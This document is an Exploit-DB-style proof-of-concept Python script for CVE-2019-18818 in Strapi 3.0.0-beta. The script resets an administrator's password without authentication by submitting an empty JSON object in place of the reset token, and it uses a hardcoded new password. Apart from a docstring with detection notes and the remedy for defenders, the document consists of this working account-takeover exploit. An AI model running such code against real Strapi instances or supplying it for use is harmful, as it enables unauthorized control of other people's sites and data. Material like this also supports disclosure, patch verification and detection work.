# Exploit Title: Strapi 3.0.0-beta - Set Password (Unauthenticated)
# Date: 2021-08-29
# Exploit Author: David Anglada [CodiObert]
# Vendor Homepage: https://strapi.io/
# Version: 3.0.0-beta
# Tested on: Linux
# CVE: CVE-2019-18818

#!/usr/bin/python
"""Proof of concept for CVE-2019-18818 (Strapi admin password reset).

What the script does, in order:

1. Reads the version string from ``/admin/strapiVersion`` using a session
   that carries no credentials.
2. Stops unless that string starts with ``3.0.0-beta`` or ``3.0.0-alpha``.
3. POSTs a reset request for ``userEmail`` to the base URL.
4. POSTs to ``/admin/auth/reset-password`` with ``code`` set to an empty
   JSON object in place of a reset token, plus the new password.
5. Treats the substring ``username`` in the response as success.

Security-relevant point: step 4 only succeeds if the server accepts a
``code`` value that is not the string token it issued. That is presumably
the missing type check behind the CVE; confirm against the vendor advisory.

Notes for defenders:

* In request logs, step 4 shows up as a POST to
  ``/admin/auth/reset-password`` whose JSON ``code`` field is an object
  rather than a string, typically preceded by a GET of
  ``/admin/strapiVersion`` from the same client.
* The remedy is a Strapi release that contains the fix for CVE-2019-18818.
  Independently of that, a reset handler should reject any ``code`` that is
  not a string.
* The version gate in step 2 is a prefix match only. It does not look at the
  build number, so it can report a build as affected even when that build
  already carries the fix.
"""
import requests
import sys
import json

# Placeholder target settings. The password value is published with this PoC,
# so an account found set to it should be treated as known to third parties.
userEmail = "valid@email.com"
strapiUrl = "http://strapi.url"
newPassword = "codiobert"

# Version prefixes the script treats as affected (heuristic, see docstring).
affectedPrefixes = ('3.0.0-beta', '3.0.0-alpha')

session = requests.Session()

# Ask the instance which version it is running. The endpoint is queried
# without authentication, so the version is assumed to be publicly readable.
versionResp = session.get("{}/admin/strapiVersion".format(strapiUrl))
versionInfo = json.loads(versionResp.text)
print("[*] strapi version: {}".format(versionInfo["strapiVersion"]))

# Bail out early when the reported version is outside the affected prefixes.
if not versionInfo["strapiVersion"].startswith(affectedPrefixes):
    print("\033[91m[-] This version is not vulnerable\033[0m")
    sys.exit(1)

# Request a password reset for the target account. The body is sent to the
# base URL exactly as written here, and the response is not inspected.
print("[*] Password reset for user: {}".format(userEmail))
resetLink = "{}/admin/plugins/users-permissions/auth/reset-password".format(strapiUrl)
resetPasswordReq = {"email": userEmail, "url": resetLink}
session.post("{}/".format(strapiUrl), json=resetPasswordReq)

# Submit the new password with `code` as an empty object instead of the
# emailed token. A server that validates the token's type rejects this.
print("[*] Setting new password")
setPasswordBody = {
    "code": {},
    "password": newPassword,
    "passwordConfirmation": newPassword,
}
setPasswordResp = session.post(
    "{}/admin/auth/reset-password".format(strapiUrl),
    json=setPasswordBody,
)

# Success is inferred from a substring match on the raw response, so any
# body that happens to contain "username" is counted as a changed password.
if "username" not in str(setPasswordResp.content):
    print("\033[91m[-] Something went wrong\033[0m")
    sys.exit(1)

print("[+] New password '{}' set for user {}".format(newPassword, userEmail))